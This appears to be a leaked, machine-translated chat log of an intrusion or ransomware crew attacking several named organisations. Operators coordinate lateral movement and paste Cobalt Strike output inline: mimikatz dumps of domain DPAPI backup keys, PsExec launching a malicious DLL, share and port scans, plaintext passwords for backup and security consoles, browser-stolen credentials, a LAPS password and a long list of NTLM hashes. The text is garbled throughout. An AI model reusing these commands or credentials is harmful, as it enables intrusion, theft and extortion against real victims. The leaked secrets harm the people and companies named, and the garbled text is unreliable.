You have 6 people, there are all the guides, do as you know it I got it, in the hostlist parameter? in the sharfinderev hostlist then? specify dc? or ...? not by hostlist there is a parameter in the sources, but it did not work with it also look at the git, maybe there is a parameter directly specified domain

```
beacon> psinject 1636 x64 Invoke-ShareFinder -Domain Northerntrust.local | Out-File sharfindINFO.txt
[*] Tasked beacon to psinject: Invoke-ShareFinder -Domain Northerntrust.local | Out-File sharfindINFO.txt into 1636 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or
ERROR: could not be contacted.
ERROR: "
ERROR: At line:849 char:9
ERROR: +         $CompSearcher.FindAll() | ForEach-Object {
ERROR: +         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR:     + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
ERROR:     + FullyQualifiedErrorId : COMException
ERROR:
WARNING: [!] No hosts found!
```

The argument is missing.
beacon> psinject 1636 x64 Invoke-ShareFinder | Out-File sharfindINFO.txt ``what was the command to say xx on this error didn't ask tl what are the answers? beacon> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 257 bytes [+] received output: Northerntrust.local ``Check the domain, maybe it was not disconnected from the domain likeShareFinder ran it, it rolled out, I guess there is no orbs :thinking: ``` [*] Tasked beacon to remove C:\Windows\Temp\wpinfo [+] received output: ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or ERROR: could not be contacted. ERROR: " ERROR: At line:849 char:9 ERROR: + $CompSearcher.FindAll() | ForEach-Object { ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException ERROR: + FullyQualifiedErrorId : COMException ERROR: WARNING: [!] No hosts found! ``You have everything) you have guides, you have a forum, you have a mindmapa when he ran out of ideas to me it's time to ask your teammate) brut? eh? eh? I ran out of ideas I found the disk D, not openShuTkUya PrIkolYNu not get it, not the staff, right? you already took it off so there is something to work with tokei do token remove adda here and brute-force does not make sense until there is no DAKEY local users plus throw in the brute-force will make sense? well xd I wrote after I did not fall off the credits besides the current polozak? ?most likely the system accts are local users in ad_users no :thinking:+dynamic passwords `` ``I need a hint on vectors, no credits fell to me except for the ntlm hash of the current user, he is on his LA car, but there is little useful his car is in OU=Lending there are more of these cars, it makes sense to ping them and brutalize on the subject of LA? Domain Controllers: Server Name IP Address ----------- ---------- DC1 10.1.10.250 DC3 10.1.10.251 `````` Encrypted Key found in local state file > Encrypted Key seems to be protected by DPAPI URL : https://www.pizzahut.com/ ( https://www.pizzahut.com/index.php ) Username : uzxmvlcsyosjluxudo@upived.online ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption https://github.com/twelvesec/passcat https://github.com/djhohnstein/SharpChromium tried with both open and closed browsers, just in case I didn't find any, none came up (will it find your accesses? https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1 is it on? did you save the accesses? saved them, got it, just sign up and save the accesses in the browser, what accesses? with mimic? and save the accesses somewhere put it on, but no problem download) do you have ej on the deck? I have the same thing URL : https://norex.growthzoneapp.com/ ( https://norex.growthzoneapp.com/ap/Events/Register/yr4Y1Rop ) Username : mattpeterson@gophersport.com ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption ``No key came up (not yet? 2 left to do with @user4?
I don't see it anymore) and I didn't do it through f7ae192f-64d6-41fa-41fa-a58a-ab726048ad7bol I did everything through which guid? Through this -``. f7ae192f-64d6-41fa-a58a-ab726048ad7b ``` or what do you mean? which one did you go through -``? [domainkey] with RSA private key sid : S-1-5-21-1434170147-1247748403-2213390517-18832 ``All six of them and drop the result first``. mimikatz # dpapi::masterkey /in:b8854128-023c-433d-aac9-232b4bca414c /pvk:ntds_capi_0_32d021e7-ab1c-4877-af06-80473ca3e4d8.pvk make a backup of the logindata do sysid remain alone just go through 6 guid) download all the files + the latest mimic on the dediktut even easier + we need to drop them on the dediktut and there decrypt as I understand and + need to know under which guid he went to herdj took his guid on the screenshot 1190 we have about 1kbd like 1 and that's too small he needs .pvk, and there's some not so .pvkclean the filesbudozhesti know yeah, I just lost those files, wanted to dump the key in another folder) you about whattakaya hat a lot of noise1 times would be enoughbut do not do it more do not do it with the domain to write?) not. prerdedelas)) and so, and then nothing:zany_face:cheater) aha and from there on the dk did? you directly to dk opened a session here I had, and on dk worked errors How?
on dk z1ad2 `` beacon> mimikatz !lsadump::backupkeys /system:z1ad2.gophersport.local /export [*] Tasked beacon to run mimikatz's !lsadump::backupkeys /system:z1ad2.gophersport.local /export command [+] host called home, sent: 706126 bytes [+] received output: Current prefered key: {90818d1b-d373-4b74-b25c-76385e8c2987} * RSA key |Provider name : Microsoft Strong Cryptographic Provider |Unique name : |Implementation : CRYPT_IMPL_SOFTWARE ; Algorithm : CALG_RSA_KEYX Key size : 2048 (0x00000800) Key permissions: 0000003f ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_EXPORT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; ) Exportable key : YES Private export : OK - 'ntds_capi_0_90818d1b-d373-4b74-b25c-76385e8c2987.keyx.rsa.pvk' PFX container : OK - 'ntds_capi_0_90818d1b-d373-4b74-b25c-76385e8c2987.pfx' Export : OK - 'ntds_capi_0_90818d1b-d373-4b74-b25c-76385e8c2987.der' Compatibility prefered key: {bceb968a-8d19-4055-874d-2a38a1e7c2e6} * Legacy key Export : OK - 'ntds_legacy_0_bceb968a-8d19-4055-874d-2a38a1e7c2e6.key' `````` ilo2m24422ldv.gophersport.local ``` no infernal comp ``` (ICMP) Target '10.1.0.86' is alive. [read 8 bytes] 10.1.0.86:443 10.1.0.86:22 (SSH-2.0-mpSSH_0.2.1) [+] received output: Scanner module is complete ``Till now run at least 12 no. well dunno. they are like this ``https://ilo2m24422ldv.gophersport.local/z1DC1ESXi2``)) except for two all are there?
z2dc1esxi2.gophersport.local + z2dc1esxi1.gophersport.local + vc-z2dc1.gophersport.local + z2dc1esxi3.gophersport.local + z1dc1esxi1.gophersport.local + z1dc1esxi3.gophersport.local z1dc1esxi2.gophersport.local z1esxi1.gophersport.local + vcz1dc1.gophersport.local + `````` ``Check the names of the nixes against the history it has 9 nixes available in ad_com, and half +- have a web face of the sphere```. Pinging vc-z2dc1.gophersport.local [10.2.1.10] with 32 bytes of data: Reply from 10.2.1.10: bytes=32 time=5ms TTL=62 Ping statistics for 10.2.1.10: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 5ms, Maximum = 5ms, Average = 5ms beacon> shell ping -n 1 vcz1dc1 [*] Tasked beacon to run: ping -n 1 vcz1dc1 [+] host called home, sent: 49 bytes [+] received output: Pinging vcz1dc1.gophersport.local [10.10.0.128] with 32 bytes of data: Reply from 10.10.0.128: bytes=32 time=1ms TTL=64 Ping statistics for 10.10.0.128: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 1ms, Maximum = 1ms, Average = 1ms good question)is it 2 systems? vc-z2dc1 and why does it have 2 hosts vcz1dc1brute the bindings do not brute-force to root onlyahaa it sqlite file above i think i threw - from ezhak what login date? and the browser is also stupidxz it from login data filea i did not understand there are 2 pcs?you are in? only 1 time do not change the combination so there is no trace of previous entries after each time reset the browser understood1 times in the sphere where? throw the juice and try them on the input ``
``+they overlap. all ea is yes too or are they all YES and the first 4 are EA+DA? ------------------------------------------------------------------------------- Administrator backup erictitchenal ilssql mattpeterson o365sync schtask symbackup trackit veeambackup veeamone watchguard ``Everything really YES? only if mimic is purely for chrome? and as a consequence, the way they store access is the same as the latest version of the hedgehog on the chrome engine to communicate with people as I understand the article in question about chrome or does mimic take everything on chrome?
6984153 beacon> shell PsExec64.exe \\10.10.0.38 -accepteula -s -d rundll32 C:\windows\temp\ccs.dll entryPoint [*] Tasked beacon to run: PsExec64.exe \\10.10.0.38 -accepteula -s -d rundll32 C:\windows\temp\ccs.dll entryPoint [+] host called home, sent: 118 bytes [+] received output: PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com ``butts http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/ let me throw you a list of hashes of all EAs, yes, yes, I didn't think so let's do it but the traffic is not pinging to my coba hardly if the admin has whitelist ip, so sessions are not flying, but z1gateway is on the whitelist maybe we can pull z1gateway and try to pimp the admin's comp? what, are we gonna fuck around with masterkeys? as long as we don't do anything without me for reviewing http://github The main thing is that you can't do anything without me.
``List of processes from this host ``10.22.0.13:3389 z1gateway:51889 ``drop the netstat see where it's coming from at all However its clears, if we have pseksek, maybe try parsing access via rdp and go via rdp? Come on, can I not encrypt? Well I sent encrypted already I'm running time you want ptsh paiload to send via pseksek in bass64 is too long. not encrypted can be shot? not arrived, i am waiting for yamisclick first...don't get it?
6984153 beacon> desktop ``and use the original use it only to test the openness of the psek4) the built-in psek is crap it's virtualkaon is connected via rdp`` msedge.exe 10864 RDP-Tcp#1 ``notice 3) exel closed:skull_crossbones:2) his pk1) yes he has ejesnetone once accepted,``the system cannot find the file specified.accep? can`t you really see the difference? The system cannot find the path specified. but i just check it a hundred times and it's slow working for you)) ahahahahmb you tricked me and put in x32? fixed the fuck) i do not understand what path it does not find? ``` The system cannot find the path specified. ``To try it without specifying the path, why was it with:``Windows\System32\PsExec.ehe already filled in the ehe a long time ago and hasn't been used yet You are sitting for a long time all, not at all) and what does /q have to do with it? Ah, we kind of specified /q51B↩agreed)`` -d Don't wait for process to terminate (non-interactive). ``So psekk has no such flags like that in the spirit of non-interactive, do not forget to put more flags because tasklist is just a step on the job and not the main goal of psekk.exe maybe? this switch is mandatory `` -d -Run the remote process in the system account. ``of the alternatives we will have rdno rewire with the original and a direct indication of the credo is not 100% info this is my versiona service itself on the pc does not have anything on it go rights your DA You have the rights to create SERVICE on the pcdatak we under the token yes, the cool we break for the simple reason that the current access level service dull has no rights to system utilities transference to the classical `` `` https://docs.microsoft.com/en-us/sysinternals/downloads/psexec `` from servsynyh which YES is it? not aklyr it is not?
file is also empty, under its tokenzakilu part of the sessions in sliptoken reworked because it seems the domain is not so specified now, earlier in the day still) aaaa who second did xox 11) see that you rework your tokens on several times (why?) 2) you have DOHU and above sessions active in the cob (you do know you're making a fuckin' noise, right?) 3) why 2 active sox? what are you doing? 185.150.190.113:61718 O5xFflqqDG7LDQJUDbdtkj54zQ8QDVMMI0W give him access to the working coba and check the list of processes again make him a tokennea, under a different daub under his context? well, he must have it open - not everything will pack up the folder better takeEtoo? take his hedgehog data analogously without a dllki? no pour on the admin one? try 2 there is shit with the session. nothing works there at alla, now user4 will come and say smoke a cigarette it's always shown that there's an rdp what's the problem? i'm confused)) and before that what was the error? alm, see) but i'll try and how he saw the rdp if you previously threw a scan where he writes that he does not see? i do not think that fit, all armas have different passwords check them on the file) they have such things on armas in ad_com ``` >ms-Mcs-AdmPwd: 0H2uIoO96Y7lmo >ms-Mcs-AdmPwdExpirationTime: 132430931771575287 they are in hell there is, like, a password from the LA admin pkkstahey have no password, then the service accounts do not rolled?
there is a file xlsx with passwords from it, but password protected) sometimes appear in the network there's an xlsx file, but it's password protected) sometimes they show up on the net stask, rps are not available he's got two laptops connected to hell, the second one is kind of dull. there is his car but it is empty while we look for more adminski stask probably covered by a firewallgrs not available vmik not working? adminski cars see ports z1print? or adminski cars? yes you on this watchguard? so stopotlichno)) lf` with Z1WATCHGUARD see 445,3389,139` approval? user4 will pull up, check it z1WATCHGUARD can see 445,3389,139 from z1print its 135,139,445,3389 visible? i wonder what is the virus and so can be immediately downloaded through a file explorer, but he will immediately get a window print, by the way, after yesterday checked it almost immediately failed again with print pf1d2swvz1print? where you try to get into it?
I have not been able to get a copy of the dll to the admin's dll, but I can't believe there is a trendy ehadlle there?throw it on the OS start it and the file will drop next to the dll, the dll should be removed as it will work out I give you the dll styler let's check it out)ok then in the blind echo got it, and echo 1 > test.tchto make sure that it is executed at all?) no way, whoamiv is just an extended output - does not work without /q, but without it the window will pop up no, it worked without quotation marks, at least the dlk ran without quotation marks? it returns empty ``` remote-exec psexec 10.22.0.13 cmd /q /c tasklist /V>C:\ProgramData\ssh\task.txt `````` itvm1:3389 Scanner module is complete ``by ip? `beacon> portscan itvm1 3389 none 1 [*] Tasked beacon to scan ports 3389 on itvm1 [+] host called home, sent: 93245 bytes [-] Could not connect to pipe: 2 more port scan on the rdc dokey, then wait for the list of processes? no, psh to run it is pale? and also guys, have you checked on tpsh?trend microi tell me more ava him on the history of 104 links from there he is a frequent guest there by the way tell me his processes) and then read through access to fsvashy your task - tasklist /v write to the file + access to fsu us there is a way to run commands through psekka just) what zhnix is not dkna dk directly hanging sphere or what?yes yes, this one we're interested in? `1803 https://vcz1dc1.gophersport.local/ui/#?extensionId=vsphere.core.inventory.serverObjectViewsExtension&objectId=urn:vmomi:VirtualMachine:vm-29463:7d9aedf7-e556-4c47-b666-fb1ecbb0b35c&navigator=vsphere.core.viTree.vmsAndTemplatesView vSphere - z1jbwmsprod1 - Summary 1 0 13252634877433381 0` he has this thing `95 https://z1av.gophersport.local:4343/ Trend Micro 0 0 0 13235239439430618240 1`which url are we interested in?I know it's not in this file, is it historyWebCacheV01.dat?
it is currently open at him)) active) steal his history file so maybe he has an edge active?) yes he has 10? in general, he also has in his downloads ClickOnceForGoogleChome.exe so maybe he uses portable chromeprocesses do not looka here hz.Observe the other question, he uses it? well his profilea it just his browser? setg Proxies socks4:185.150.190what's up, we tried to put the profile on the deck in Mozilla - does not work, asks for e-mail or something like that when I say give me a proxy then now I'm asking for a fresh version) no, it was yesterday before he left, all ready 1 minute ago said all would work so fast Directly just removed?).the archive here this folder profilesdrop it right now his browser to decode the profile in the FF need a master password plus for some reason, the directory install FF so while vpn enabled try to findbut you have YES from here?so datak this car left (through vpn man sits) would not it be better to make a mount on a remote or some server that would always have access to this network, I propose to make mounts on all trusts I started you with a mount then it is fixed in the network and try to get to the DC yes, come on?but 1 flew out the code mimodai dllpostavliv this confuheshey I have already dumped the code in the studioa here is not without DA was? `https://phanein.televisa.com.mx/vpn/indexhtml`they have 2fa (((if there are live sessions on it, you can zasvnit on `rawint.com` grid is big, I would not want to fuck it upwhen the session will come to life, fix it on any server `CORP.TELEVISA.COM.MX\Hgutierreze R8WTksIOle1rP8)P```` Nombre de grupo Domain Admins Comentario Designated administrators of the domain Miembros ------------------------------------------------------------------------------- accreco avamarexchange EndPoint ES050616C gdtidua IWAM_GSCCORP opera_wintel_corp operador_wintel operaproy SCMusr t1812 Se ha completado el comando correctamente. 
[+] received output: Se procesará la solicitud en un controlador de dominio del dominio corp.televisa.com.mx. No se ha encontrado el nombre de grupo. Puede obtener más ayuda con el comando NET HELPMSG 2220. [+] received output: Se procesará la solicitud en un controlador de dominio del dominio corp.televisa.com.mx. Nombre de alias administrators Comentario Administrators have complete and unrestricted access to the computer/domain Miembros ------------------------------------------------------------------------------- accreco Domain Admins IWAM_GSCCORP opera_wintel_corp TELEVISA\Enterprise Admins. Se ha completado el comando correctamente. ``I hope I have time to download here adinfopriyatnogo rest, in toucha well, so even sleep myself have time to be in the office 15.10 at 13:00-14:00 Moscow time :space_invader:now clean only ... if I can so tell me what time plan because I do not know and I need to set the alarm clock, leave when you come to fill the builder dllok and then turn me off here another 7-8 hours in any case, I'm dead here as alive but not alive at the same time) all like zombies need to sleep normally would like to tomorrow or tomorrow i'm confused, what time tomorrow? Total servers on AD: 5 Live servers: 2 Pulled servers: 2 Total armies in AD: 134 Live armies: 28 Arms drawn: 18 Everything is encrypted. ``Statistics then here + finished? All dead, the last strohybild run? Before tomorrow let's go around 11, I guess, tomorrow's case studies mostly, and the day after tomorrow maybe what will go to the back? Zavata to what time, and tomorrow at what time? at 22 yes then wrap up for today@tl2 At 22 home? Neta well in principle it's almost 22 ... @tl1 said what time tomorrow? What time? 
work in the morning sorry guys I have a rocket failed and I did not notice if anything - write if any urgent issues need to prepare for closing Give me your dll, I'll throw you on the network and create a conf@user4 for you a separate task will be file sharing, ways to transfer files and other things i hope i do not need to explain that you do not shine your resources under the umbrella?you can get from /16 from heredns? @user7 check the tab gohostsokok I understand my stupor, now everything will be you strange) you throw networks where you have not yet hit a dead end and then you have no work) and dk that you get from the scan sabnets scan when you are connected to a VPN you can work well bladhound? it won't even ask for YES without an rdp ``` of course i asked you what to do, you have several accounts, there are scanners and how to work with the vpn you know how to work there is a working vpnp i understand when the username/password does not fit yes i said that you are responsible for them? i had to directly supervise the operation? "let go" i figured i was just a questioner here so he wouldn't even ask for yes without an rpdtam there were work options anyway why you let @user7 off so easy + i figured you and @user8 were still together and why not work with it?\tried rdp itself authorizes under these creeds? \tried rdp, so no user can walk on rdpv `lrhc.org` entsentireprise appeared admin rights in the neighboring domain, half a day tried to remove the ADinfo. Now in the next domain found a car with servakom 2003, ms17_commands work, we think to add there a local admin and already next work in my last was 2 users. from one creed did not fit, the second is 2fa. 
so while with @user8 worknu how are you doing?if progress on the current nets without conf confi you collect information from yourself locally as I come immediately createmne need to leave, I'll be close to 6 hours + write me back in a ls names of folders that were inside the archive all otpolzhem in personal info skilka files:thinking:@user8 you in control of their tasks, I'll ask you)he while the chief in this problem in general attack questions @user8a, just I guess I do not quite understand the indirect workd we sit next to) if you mean it?I can give you 3 people a conference on common questions. They will have their own nets, why join you in the conference? @tl1 Since @user4 and @user7 are with me, can you put them in the conference?around 6 or 7 I'll give the network with YES and we'll prepare it for closing for the most part today independently I'll give you files like him yesterday, for all questions please contact him @user4 @user7 you indirectly work with @user8 @user8 with his then so @user3 works with the forum I can not go further, can me to user8 to help Yesterday I have no access to the coba (Filling the forum by the way what are we busy?then I explain the tasks for today + so, all set? hello all wait until 20 minutes and start on the spot no one is there? hello all found no esxi no movement? on esxi don't roll here's ftp access in esxi no shell ftp one? on esxi it's not linux but its own shell what is it on esx and web ftp let me in? the second rubric ``` https://10.75.0.170/web/bin/index.html#/welcome Admin G0F0rw@rd123! ``rubrik https://10.1.0.171/web/bin/index.html#/welcome admin G0F0rw@rd123! did not come upa through the center did not have access to them? but they do not go to esx at all, if only by schnet Nothing in the mail, the mail is on gmail. the keylog is hung up?
Fill in the cmd in the mail, didn't you find any? 3675 Objects returned I don't know how many unique hashes there are? Wouldn't that be too much for the money? for brute force hashes on hashes, can i fuck all the dsink on kmd5? and on vime, which was encrypted yesterday? i don't know where or how anything yet looking for the ehshehs' credentials. no wonder they restored it They have backups on the xyxes + two Rubrics in the first three clusters in each of them replicated backups so what do we have here? until mondaykazavtra what time is it? well well today i can not do it too then tomorrow nashili esx's But I don't feel like closing today. there are a lot of servers and a lot of armies - it will take about 6 hours barely))) chanson has the mb file where are you? I think they found the password to the esx, how long are you going to sit? `https://login.sophos.com/login.sophos.com/oauth2/v2.0/authorize,04/30/2020 9:53:35 AM,13232732015862662,smhanson@lrhc.org,Menu12762` User name shanson Last logon 12/18/2020 3:22:23 PM User name gsnelson Last logon 12/19/2020 2:57:41 PM If they were here today, they will be here tomorrow, too Check the latest Lastlogon of the right guys cobalt is quite capable of it no? @tl2 do we have a keylogger? I'll check my mail on my desk, on a piece of paper)) so it could stay in the mail correspondence do not want the guys to keep passwords from the sphere Sophos Shanson@lrhc.org 2476.Fgjd He's not there yet, have you checked the mail? 
But it's empty, I told you we opened these files but it did not work dog http://snapcraft.io/install/onenote-desktop/ubuntu#install and still waiting for @tl2 if he solves the problem) try to get on this machine and look there but there are no passwords to the sphere you have not forgotten about the ndp on ntlm? then move on to more complicated methods of the browser, pick up the password to the file) put on the deck and see this thing s? https://www.bitrecover.com/free/onenote-viewer/ I really want to test something))) Please give me the .one file. Take the help of OneNote Converter. This software allows you to read OneNote file without OneNote installation. This software also provides many advanced features. With this software, users can easily convert OneNote to PDF, OneNote to DOC, DOCX, OneNote to Image (png, jpg, tiff, bmp, and gif). that kind of thing. https://www.quora.com/How-can-a-person-read-a-OneNote-file-without-OneNote - it works with the table in the ehel if there is no one there already - there is a file with passwords password-protected - please send it here - it is not working from the browser - does the file format work - there is no clerks 6 hours idltimezalyut if no one there already has time on the car where you took it - it says software not licensed - found OneNote with notes about the whole sphere - downloaded but not opened Host Name: PMA2013 OS Name: Microsoft(R) Windows(R) Server 2003 Standard x64 Edition OS Version: 5.2.3790 Service Pack 2 Build 3790 OS Manufacturer: Microsoft Corporation OS Configuration: Additional/Backup Domain Controller OS Build Type: Multiprocessor Free Registered Owner: Eleah Registered Organization: Product ID: 76869-644-7406004-50507 Original Install Date: 10/10/2013, 11:47:49 PM System Boot Time: 7/27/2020, 11:46:57 AM System Manufacturer: 
VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 4 Processor(s) Installed. [01]: EM64T Family 6 Model 45 Stepping 7 GenuineIntel ~2300 Mhz [02]: EM64T Family 6 Model 45 Stepping 7 GenuineIntel ~2300 Mhz [03]: EM64T Family 6 Model 45 Stepping 7 GenuineIntel ~2300 Mhz [04]: EM64T Family 6 Model 45 Stepping 7 GenuineIntel ~2300 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 6/22/2012 Windows Directory: C:\WINDOWS System Directory: C:\WINDOWS\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (GMT-06:00) Central Time (US & Canada) Total Physical Memory: 8,191 MB Available Physical Memory: 5,839 MB Virtual Memory: Max Size: 11,827 MB Virtual Memory: Available: 10,167 MB Virtual Memory: In Use: 1,660 MB Page File Location(s): C:\pagefile.sys Domain: PMASC.LOCAL Logon Server: \\PMA2013 192.168.0.247 Some random domain I found --- Chromium Credential (User: shanson) --- URL : https://app.smartsheet.com/ Username : shanson@lrhc.org Password : 2476.Fgjd --- Chromium Credential (User: shanson) --- URL : https://noc/ Username : lrhc\shanson Password : 279.smh --- Chromium Credential (User: shanson) --- URL : http://10.10.36.11/ Username : 8523 Password : 1919 --- Chromium Credential (User: shanson) --- URL : https://login.oracle.com/ Username : shanson@lrhc.org Password : 2476.Fgjd --- Chromium Credential (User: shanson) --- URL : https://lrhesx7.lrhc.local/ Username : root Password : a good question on write a request to the conf + gofer as soon as you tighten everything already begins to noise Well, I understand that all the noise from the fact that it works in a lot of threads ... well, if you pre-tighten everything and mate, it is quite, no? and our programmers can not adjust it to make less noise? our programmers can not adjust it to make it quieter? 
in 6 hours after launch?) i.e. for 6 and 6 for the process itself ehei you either finish everything in 12 hours as soon as you start the countdown immediately it seems to me gofer is not such a bad idea)) yup, we scanned all the ports and i knocked on each ... blahanetu in the field cc 1) put yourself winscp software 2) upload sox from the net (better from some techie's car or even a DA) 3) run the crescendos of all involved in the sphere on port 22 by ip once one pair of accesses then the next quest for you) you will be in linux davay i need one as a volunteer i have touched it recently `Thursday, December 10, 2020 8:59:03 AM` call it in center and the admin from esxxi definitely in work or they would not keep it 5 years they have at least 5 years) `Monday, March 23, 2015 3:30:26 PM` missing I personally discounted it not long ago it was clear to everyone so? dn:CN=LRHVCENTER1,OU=Infrastructure Servers,OU=LRHC Servers,DC=lrhc,DC=local >objectClass: top >objectClass: person >objectClass: organizationalPerson >objectClass: user >objectClass: computer >cn: LRHVCENTER1 >description: lrhvcenter1.lrhc.local >distinguishedName: CN=LRHVCENTER1,OU=Infrastructure Servers,OU=LRHC Servers,DC=lrhc,DC=local >instanceType: 4 >whenCreated: 20150323153026.0Z >whenChanged: 20201210085903.0Z >uSNCreated: 70143429 >uSNChanged: 4266849973 >name: LRHVCENTER1 >objectGUID: {4207C326-1250-45A8-B8DD-A8CAE3E8BEDB} >userAccountControl: 4096 >badPwdCount: 0 >codePage: 0 >countryCode: 0 >badPasswordTime: 0 >lastLogoff: 0 >lastLogon: 132525179438078873 >localPolicyFlags: 0 >pwdLastSet: 132515225330348320 >primaryGroupID: 515 >objectSid: S-1-5-21-11880765-1498958316-1734353810-13045 >accountExpires: 9223372036854775807 >logonCount: 6778 >sAMAccountName: LRHVCENTER1$ >sAMAccountType: 805306369 >operatingSystem: unknown >operatingSystemVersion: unknown >operatingSystemServicePack: Likewise Open unknown.unknown.unknown >dNSHostName: lrhvcenter1.lrhc.local >servicePrincipalName: HOST/lrhvcenter1 
>servicePrincipalName: HOST/lrhvcenter1.lrhc.local >objectCategory: CN=Computer,CN=Schema,CN=Configuration,DC=lrhc,DC=local >isCriticalSystemObject: FALSE >dSCorePropagationData: 20201104221959.0Z >dSCorePropagationData: 20200814152314.0Z >dSCorePropagationData: 20190403161636.0Z >dSCorePropagationData: 20180822143249.0Z >dSCorePropagationData: 16010714042017.0Z >lastLogonTimestamp: 132520643431981435 >msDS-SupportedEncryptionTypes: 28 Give sphere info from ad infos It's weird, I'm poking around in admin balloons, they have a bunch of installers there, a bunch of scripts to install/update/disable updates, etc. but never came across anything related to vsphere or veeam... OK `Yes - LA on trust` so nmsapps admin on dc means group yes - LA on entry point in this domain rolls crosshairs from lrhassmate pass from yes in different domains, kerb, yes - LA on trust? the old grandfather way `shell dir` how did it go? fine [DC] 'ELEAH.LOCAL' will be the domain [DC] 'ELEAHSERVER.ELEAH.LOCAL' will be the DC server [DC] Exporting domain 'ELEAH.LOCAL' 
66048 4694 DHanson 96d855ffe96804f4bb6aad56029bd849 512 4655 PRH-2750$ 9d571ad45b2e5d3c4df38f27a68a3337 4096 3163 bkipp 64f12cddaa88057e06a81b54e73b949b 66048 3320 PRH-2879$ 3ae89a0f3fa5df827dea407b38a8dde5 4096 4626 PRH-1450$ d8b6b5d0eb6147e9c92472a0f929e0b8 4096 3306 PRH-2871$ 9d0a65a990da75e25ce968612642571 4096 7154 jeipperle a1bfa9473289b6f10f741d90c0fc0450 66048 3348 PRH-2965$ 4b91f720402a1a8e193914e68adabf16 4096 3310 PRH-2868$ 6da66ddba34ad787a49bb09378a1b2d9 4096 6648 PRH-3074$ 62320e4bfa720acca6e9481cbaacff48 4096 2186 jbraun b1a452b9c9776bf77f0152ba00dff0de 66048 3251 PRH-2668$ 98f5a70026a9c49e1894e1ea66eb20cc 4096 2814 PRH-2279$ 87d7787552137aafa0d33e1ba89fefb0 4096 7117 PRH-3093$ 8d3aea02c848119288f35a1ee8ca6ae3 4096 3352 khokanson 64f12cddaa88057e06a81b54e73b949b 66048 3273 PRH-2681$ c3edd64601c65b14c19df80c1b7b5d75 4096 4633 jstmartin 945abe7cfdc19024bc81396da5c29955 66048 2750 PRH-2231$ 657c27265d2a8f8113b35267048b420d 4096 7606 ksabby ed3d51b0abbf9fd3a28fd1cec06258e1 66048 2761 PRH-2261$ 8f81ee3cd938bac45f97d8662f63d10f 4096 2610 lenglund 8a2b5ae6a69f220429cb9c537d4aeb2a 66048 2758 PRH-2272$ cf3eb50da6b6d6c9a07a7add28b73c39 4096 2777 PRH-2265$ 59dae3b9fc14fdd9d61e746a9c5a688d 4096 6698 caschnewitz e20e421380a905858cd7cca7e2334712 66048 3295 PRH-0720$ a12f4cd44186c443d29b7ac2678cad9e 4096 2781 PRH-2251$ 87187c276390961b48102db839e92947 4096 7111 PRH-2994$ 2a25ab77a2c9b379b215b8f75611043b 4096 2740 PRH-2264$ 4ff7ba4159d4cafe0220ed42212c2f50 4096 4650 PRH-3098$ 32be12fbbbb90e103be3a7d7262bcf0d 4096 4630 PRH-2995$ 37f8c8265c0cee61d5f496b0da1c6ee1 4096 4672 PRH-3130$ ea358bf16629e3c88471e536c33f02f6 4096 2751 PRH-2278$ 8dc881169a2eafc134c47468efd51d95 4096 2759 PRH-2255$ dd9a8f61f7cc371ac58acff7f0072f 4096 2753 PRH-2270$ f69bcf09399f62e2e2b2bf2e37d0579b 4096 2743 PRH-2268$ 971840c8a501c7c3fde08de753bfd8b5 4096 3309 PRH-2870$ 37cc9d97d8b353045bbf108b46cef1de 4096 7124 DESKTOP-O3PC5L5$ 95fd88d2285c679ce86b44f656e437db 4096 7106 sstallman 
4636190bde3bb52ad2d29ca3784cb579 66048 6660 PRH-3080$ 04a23b97267dd7d93ccd60ca85b7a263 4096 2735 PRH-2267$ 876aa56e448c257cd943119481321f69 4096 3149 jjoslin 64f12cddaa88057e06a81b54e73b949b 66048 4677 PRH-3120$ 852ac56835ecb97ffa00e78e40658717 4096 2733 jrolfzen 82d64e208fd9796e72241542b9a00de2 66048 6656 PRH-3091$ ceeaa3a1d009bd69d6ea58ba06a341b 4096 4671 PRH-3128$ 18ab3f3f19d366a2cd9198bfbc08c345 4096 2799 PRH-2609$ 7afaaa2e7f8fc3c8ffc782eaf961a2c9 4096 3211 jbocksell 64f12cddaa88057e06a81b54e73b949b 66048 2329 bsiegel 97b592737f87a48fe07e59db8659d166 66048 2752 PRH-2275$ e783586bb4a755db45cd44f6765a5a9a 4096 4643 PRH-3069$ 2204f8a41026fd8734ef9f87465926fc 4096 4609 khyttsten 64f12cddaa88057e06a81b54e73b949b 66048 2400 notto 9b3938e7d8f74d791bb5335d8558c527 66048 2555 astmartin c81004611eca2b7b5a875c37dc9c6ff6 66050 2628 banderson c9b7a720d925c8db71bf5a73cf48f6e1 66050 3191 PRH-2684$ b5a24dc12a07a0125a89ed7f3ac132fa 4096 4641 PRH-3092$ 21ece97d87138ce038aebf0db655b0e2 4096 4692 smarshall c2d80d6168ba9d4ddf90710501585508 66050 3233 PRH-2682$ 7c574a6921aab39d93161cd394dae6a2 4096 2292 lrapp ccc94849ea3e359188562edbdbad5da1 66050 6686 phabberstad 64f12cddaa88057e06a81b54e73b949b 66050 2710 cblascyk a87f3a337d73085c45f9416be5787d86 66048 3189 PRH-2686$ 70fc2d23af2359326b865ffe594ad0c2 4096 4673 IT-2019$ 